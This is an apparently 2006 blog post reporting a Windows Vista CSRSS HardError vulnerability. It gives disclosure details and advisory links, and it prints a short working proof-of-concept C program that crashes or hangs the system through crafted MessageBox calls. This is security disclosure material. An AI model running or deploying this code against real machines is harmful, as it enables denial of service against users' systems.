First (or one of the first) vulnerability appears for Windows Vista

Even before the operating system has been released to the public, vulnerabilities have started appearing for the next generation of Windows, Windows Vista. A vulnerability in the Windows family of operating systems, including Windows Vista, has been published, and proof of concept code has been publicly released.

Details

The vulnerability arises from the way Windows handles HardError messages within WINSRV.DLL. It has the potential for code execution in the CSRSS (Client/Server Runtime Subsystem) process when the MessageBox() function is supplied with specially crafted input: the MB_SERVICE_NOTIFICATION flag together with a message or caption beginning with \??\. The POC code for the vulnerability is

    #include <windows.h>

    int main(void)
    {
        int i;
        /* Message and caption text beginning with the NT object-manager prefix \??\ */
        char bug1[] = "\\??\\XXXX";

        /* MB_SERVICE_NOTIFICATION hands the message box to CSRSS as a HardError
           request; repeated calls trigger the crash or hang described below. */
        for (i = 0; i < 10; i++) {
            MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
        }
        return 0;
    }

The vulnerability appears to be a memory corruption in the kernel-mode side of the subsystem, and it causes the system to crash or hang after a few attempts. It seems to happen because the message is logged to the event log, which may point to a problem in the event log processing.

This vulnerability was independently disclosed on 15th December and confirmed by Microsoft earlier today on the MSRC team weblog. Secunia has rated it as less critical, because it can only be exploited when a user is logged on locally, and a remote attacker would only get the privileges of the locally logged-on user.

Closing thoughts

Some people may question my judgment in putting the exploit code up here on my website before a patch is available from Microsoft. The exploit code is already available in the wild and there are no restrictions on it; at least people will be aware of what they are up against.

For more details:

Microsoft Original Advisory:

http://blogs.technet.com/msrc/archive/2006/12/22/new-report-of-a-windows-vulnerability.aspx

Full Disclosure:

http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html

Determina Security research:

http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
